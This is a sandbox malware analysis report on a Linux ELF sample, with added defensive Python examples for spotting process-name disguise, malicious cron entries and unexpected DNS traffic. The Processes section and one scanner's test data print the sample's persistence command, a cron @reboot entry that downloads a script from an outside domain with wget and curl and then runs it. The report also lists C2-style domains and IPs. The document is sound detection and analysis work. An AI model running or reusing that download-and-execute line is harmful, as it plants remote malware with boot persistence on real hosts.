Malware Analysis Report

2024-11-15 08:23

Sample ID 241028-blj5astrdm
Target 47ee0b8842a526fc0c6ff94fe4ca2ad6.bin
SHA256 5f304253a32307d60af3514a24984339039a8131526d81e7091b34ba27d76193
Tags: defense_evasion discovery execution persistence privilege_escalation
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 7/10
SHA256: 5f304253a32307d60af3514a24984339039a8131526d81e7091b34ba27d76193
Threat Level: Shows suspicious behavior

The file 47ee0b8842a526fc0c6ff94fe4ca2ad6.bin was found to show suspicious behavior (score 7/10).

Malicious Activity Summary

Tactics: defense_evasion discovery execution persistence privilege_escalation

Signatures triggered:
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information

MITRE ATT&CK

Enterprise Matrix V15. Tactics tagged on this sample: defense_evasion, discovery, execution, persistence, privilege_escalation.

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:13

Reported

2024-10-28 01:16

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

136s

Command Line

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

Signatures

File and Directory Permissions Modification (defense_evasion)

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 80.152.203.134 | N/A | N/A

Creates/modifies Cron job (execution, persistence, privilege_escalation)

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.FJlr1F | /usr/bin/crontab | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A

Reads runtime system information (discovery)

Description | Indicator | Process | Target
File opened for reading | /proc/1573/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/1/cmdline | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
File opened for reading | /proc/mounts | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A
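The sample reads /proc/1/cmdline, /proc/<pid>/status and /proc/mounts to learn about the host it landed on; read from the defender's side, the same /proc files expose the disguise recorded under "Changes its process name": the ELF in /tmp shows up in ps as "/bin/sh /etc/init.d/rcS". The following is an added example, not code from the report or from the sample, that compares each process's real executable (/proc/<pid>/exe) with what argv[0] and comm claim. The snapshot it checks is constructed: the PID 4242 and the benign systemd, bash and python3 entries are invented for illustration, only the disguise string and the ELF path come from the report.

```python
"""Hunt for processes whose advertised name disagrees with the executable
behind them, the pattern behind the "Changes its process name" row above.

Added example, not code from the sandbox report. The PROCS entries are
constructed: PROCS[0] imitates the report's row (an ELF in /tmp presenting
itself as "/bin/sh /etc/init.d/rcS"), the others are typical benign cases.
"""
import os
from dataclasses import dataclass

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class ProcessView:
    pid: int
    exe: str      # os.readlink("/proc/<pid>/exe"): the file actually executing
    cmdline: str  # /proc/<pid>/cmdline with NUL separators replaced by spaces
    comm: str     # /proc/<pid>/comm: kernel task name, at most 15 characters


def _claimed_name(cmdline: str) -> str:
    """Basename of argv[0], which is what ps and top display."""
    first = cmdline.split(" ", 1)[0] if cmdline else ""
    return os.path.basename(first.lstrip("-"))  # login shells prefix argv[0] with "-"


def assess(p: ProcessView):
    """Return (severity, reasons) for a suspicious process, or None."""
    exe_base = os.path.basename(p.exe.replace(" (deleted)", ""))
    claim = _claimed_name(p.cmdline)
    reasons = []
    # python3 running /usr/bin/python3.10 is fine, so compare by prefix
    if not claim or not exe_base.startswith(claim):
        reasons.append(f"argv[0] {claim!r} does not match exe {p.exe!r}")
    # comm is taken from the executed file name; prctl(PR_SET_NAME) or
    # renaming the file after exec ("Renames itself") makes it disagree
    if p.comm and not exe_base.startswith(p.comm):
        reasons.append(f"comm {p.comm!r} does not match exe {p.exe!r}")
    if not reasons:
        return None
    if p.exe.startswith(SCRATCH_DIRS) or p.exe.endswith(" (deleted)"):
        reasons.append(f"executable is in a scratch directory or unlinked: {p.exe}")
        return "high", reasons
    return ("medium" if len(reasons) > 1 else "low"), reasons


def hunt(procs):
    """Return [(pid, severity, reasons)], worst severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    out = []
    for p in procs:
        verdict = assess(p)
        if verdict:
            out.append((p.pid, verdict[0], verdict[1]))
    return sorted(out, key=lambda t: order[t[1]])


def snapshot_live_proc():
    """Build ProcessView entries from a live Linux /proc. Reading another
    user's exe link needs root; kernel threads and vanished PIDs are skipped."""
    views = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
            with open(f"/proc/{pid}/comm", encoding="utf-8", errors="replace") as fh:
                comm = fh.read().strip()
        except OSError:
            continue
        views.append(ProcessView(pid, exe, cmdline, comm))
    return views


# Constructed snapshot, not captured from the sandbox.
ELF = "/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf"
PROCS = [
    ProcessView(4242, ELF, "/bin/sh /etc/init.d/rcS", "sh"),  # the disguise from the report
    ProcessView(1, "/usr/lib/systemd/systemd", "/sbin/init splash", "systemd"),  # benign: /sbin/init symlink
    ProcessView(2048, "/usr/bin/bash", "-bash", "bash"),  # benign: login shell
    ProcessView(2100, "/usr/bin/python3.10", "python3 /opt/app/main.py", "python3"),  # benign: versioned binary
]

if __name__ == "__main__":
    for pid, severity, reasons in hunt(PROCS):
        print(pid, severity, "; ".join(reasons))
```

On a live host, replace PROCS with snapshot_live_proc() and run as root. The systemd entry is kept in the sample on purpose: an argv[0] of /sbin/init backed by /usr/lib/systemd/systemd is a common benign mismatch, which is why a single disagreement only rates "low" and the scratch-directory or unlinked executable is what lifts the ELF to "high".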

Processes

/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf

[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]
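The /bin/sh command line above keeps the existing table (crontab -l), appends one @reboot entry and reinstalls the result with crontab -; the entry changes into /tmp, tries wget and then curl for http://hailcocks.ru/wget.sh, makes the file world-executable and runs it. The following is an added example, not code from the report or from the sample, that scans a crontab for exactly that fetch-then-execute shape. CRONTAB_SAMPLE is constructed: only its @reboot line reproduces the entry the sample installed, the certbot and metrics lines are invented benign neighbours, and the downloader and scratch-directory lists are assumptions.

```python
"""Flag crontab entries that fetch a remote file and execute it, the pattern
installed by the report's `(crontab -l ; echo "...") | crontab -` command.

Added example, not code from the sandbox report. CRONTAB_SAMPLE is
constructed; only its @reboot line reproduces the sample's entry.
"""
import os
import re
import shlex
from dataclasses import dataclass, field

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}        # assumed list
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")          # assumed list
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\";|&<>]+")


@dataclass
class CronFinding:
    line_no: int
    schedule: str
    urls: list = field(default_factory=list)
    reasons: list = field(default_factory=list)


def split_schedule(line: str):
    """(schedule, command) for a user crontab line; None for blank lines,
    comments and VAR=value assignments."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):
        parts = stripped.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    fields = stripped.split(None, 5)
    return (" ".join(fields[:5]), fields[5]) if len(fields) == 6 else None


def simple_commands(command: str):
    """Split one cron command on ; | && || into token lists."""
    out = []
    for seg in re.split(r"\|\||&&|[;|]", command):
        seg = seg.strip()
        if not seg:
            continue
        try:
            toks = shlex.split(seg)
        except ValueError:       # unbalanced quotes: fall back to whitespace
            toks = seg.split()
        if toks:
            out.append(toks)
    return out


def _grants_exec(mode: str) -> bool:
    return "x" in mode or any(ch in "1357" for ch in mode)   # +x, 755, 777 ...


def analyse(schedule: str, command: str):
    """(reasons, urls) when the entry downloads something and executes
    from a scratch directory, otherwise None."""
    reasons, downloaded, executed, in_scratch = [], False, False, False
    if schedule == "@reboot":
        reasons.append("runs at every boot")
    for toks in simple_commands(command):
        prog = os.path.basename(toks[0])
        if prog == "cd" and len(toks) > 1 and toks[1].startswith(SCRATCH_DIRS):
            in_scratch = True
            reasons.append(f"works in scratch directory {toks[1]}")
        elif prog in DOWNLOADERS:
            downloaded = True
            reasons.append(f"downloads with {prog}")
        elif prog == "chmod" and len(toks) > 2 and _grants_exec(toks[1]):
            reasons.append(f"chmod {toks[1]} {toks[2]} makes the download executable")
        elif (toks[0].startswith("./") and in_scratch) or toks[0].startswith(SCRATCH_DIRS):
            executed = True
            reasons.append(f"executes {toks[0]} from a scratch directory")
        elif prog in ("sh", "bash") and len(toks) > 1 and (
                in_scratch or toks[-1].startswith(SCRATCH_DIRS + ("./",))):
            executed = True
            reasons.append(f"runs a scratch-directory script via {prog}")
    urls = list(dict.fromkeys(URL_RE.findall(command)))   # de-duplicated, in order
    return (reasons, urls) if downloaded and urls and executed else None


def find_suspicious_cron_entries(crontab_text: str):
    findings = []
    for n, line in enumerate(crontab_text.splitlines(), 1):
        parsed = split_schedule(line)
        if parsed is None:
            continue
        verdict = analyse(*parsed)
        if verdict:
            findings.append(CronFinding(n, parsed[0], verdict[1], verdict[0]))
    return findings


# Constructed table; line 3 is the entry the sample appended, the rest is invented.
CRONTAB_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
*/5 * * * * curl -s https://metrics.example.invalid/ping | logger -t metrics
"""

if __name__ == "__main__":
    for f in find_suspicious_cron_entries(CRONTAB_SAMPLE):
        print(f"line {f.line_no} [{f.schedule}]: {', '.join(f.reasons)} -> {f.urls}")
```

Feed it the output of crontab -l -u <user> for each account, or the files under /var/spool/cron/crontabs as root. The tmp.FJlr1F entry in the Files section below is what crontab(1) leaves behind on a sandbox: it writes the new table to a temporary file in the spool directory and renames it into place, so the modified file recorded is the temporary name rather than the user's table. The metrics line is kept in the sample to show the discriminator: a curl on its own is not flagged, only a download that is then executed.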

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | N/A | udp
DE | 80.152.203.134:53 | kingstonwikkerink.dyn | udp
CZ | 195.133.92.51:10701 | kingstonwikkerink.dyn | tcp

The first row is mDNS to the link-local multicast group and is normal for the Ubuntu image. The second row is the DNS query for kingstonwikkerink.dyn sent to 80.152.203.134 instead of the sandbox's resolver, which is what the "Unexpected DNS network traffic destination" signature flagged; the third row is the TCP session to 195.133.92.51 on port 10701 that the report associates with the same name.
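The rule behind the "Unexpected DNS network traffic destination" signature, and the pivot an analyst makes from it, can be run over these rows directly. The following is an added example, not code from the report: it parses the three Network rows, flags DNS sent to a resolver the host is not configured to use, and links any later TCP contact on an uncommon port back to the resolver that answered for its name. EXPECTED_RESOLVERS and COMMON_TCP_PORTS are assumed host configuration, and "-" in NETWORK_ROWS stands in for the missing domain of the mDNS row.

```python
"""Triage sandbox network rows: DNS to a resolver the host is not configured
to use, followed by a TCP session to the name that resolver answered for.

Added example, not code from the sandbox report. NETWORK_ROWS reproduces the
report's three Network rows; the resolver and port sets are assumptions.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

EXPECTED_RESOLVERS = {"127.0.0.53", "10.0.0.2"}   # assumed: resolved stub + site resolver
COMMON_TCP_PORTS = {22, 25, 80, 443, 465, 587, 993, 995, 8080, 8443}  # assumed


@dataclass
class Flow:
    country: Optional[str]
    ip: str
    port: int
    domain: Optional[str]
    proto: str


def parse_rows(text: str):
    """Parse 'Country Destination Domain Proto' rows; '-' marks a missing domain."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        country, dest, domain, proto = line.split()
        ip, port = dest.rsplit(":", 1)
        flows.append(Flow(None if country == "N/A" else country, ip, int(port),
                          None if domain == "-" else domain, proto))
    return flows


def triage(flows, resolvers=EXPECTED_RESOLVERS):
    """Return findings in row order. A TCP contact whose name was resolved
    through an unexpected resolver is promoted to a C2 candidate."""
    findings = []
    resolved_via = {}   # domain -> IP of the server that answered the DNS query
    for f in flows:
        addr = ipaddress.ip_address(f.ip)
        if f.proto == "udp" and f.port == 5353 and addr.is_multicast:
            continue    # mDNS to 224.0.0.251 is ordinary link-local chatter
        if f.proto == "udp" and f.port == 53:
            if f.domain:
                resolved_via[f.domain] = f.ip
            if f.ip not in resolvers:
                findings.append({"kind": "dns_to_unexpected_resolver", "domain": f.domain,
                                 "resolver": f.ip, "country": f.country})
        elif f.proto == "tcp" and f.port not in COMMON_TCP_PORTS:
            via = resolved_via.get(f.domain)
            kind = "c2_candidate" if via and via not in resolvers else "tcp_on_uncommon_port"
            findings.append({"kind": kind, "domain": f.domain, "ip": f.ip, "port": f.port,
                             "country": f.country, "resolved_via": via})
    return findings


# The report's Network rows, with '-' for the mDNS row's empty domain column.
NETWORK_ROWS = """\
N/A 224.0.0.251:5353 - udp
DE 80.152.203.134:53 kingstonwikkerink.dyn udp
CZ 195.133.92.51:10701 kingstonwikkerink.dyn tcp
"""

if __name__ == "__main__":
    for finding in triage(parse_rows(NETWORK_ROWS)):
        print(finding)
```

With the assumed resolver set the output is one "dns_to_unexpected_resolver" finding for 80.152.203.134 and one "c2_candidate" for 195.133.92.51:10701 carrying resolved_via=80.152.203.134. If 80.152.203.134 were an approved resolver the same TCP row would only rate "tcp_on_uncommon_port", which is the point of carrying the resolver through: the name-resolution path, not just the destination, is what separates the two.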

Files

/var/spool/cron/crontabs/tmp.FJlr1F

MD5: 83171e3b993f7e5156610ec021956f99
SHA1: 50d0c29250d3df506f2d6d45a6df96ca0164d4ce
SHA256: dd334f58ab4dcad925152e554fd9fc0a491f92e0c2ae992bdb2224be25a6cc4a
SHA512: 34b475c5ea363b48102a902ea127d4f165f435cb85aa1b0dd3ade0cc92e57ff84ccf963dc0688302749992bdc4d834c10b1f75db6b913e07ed5cd814d637106f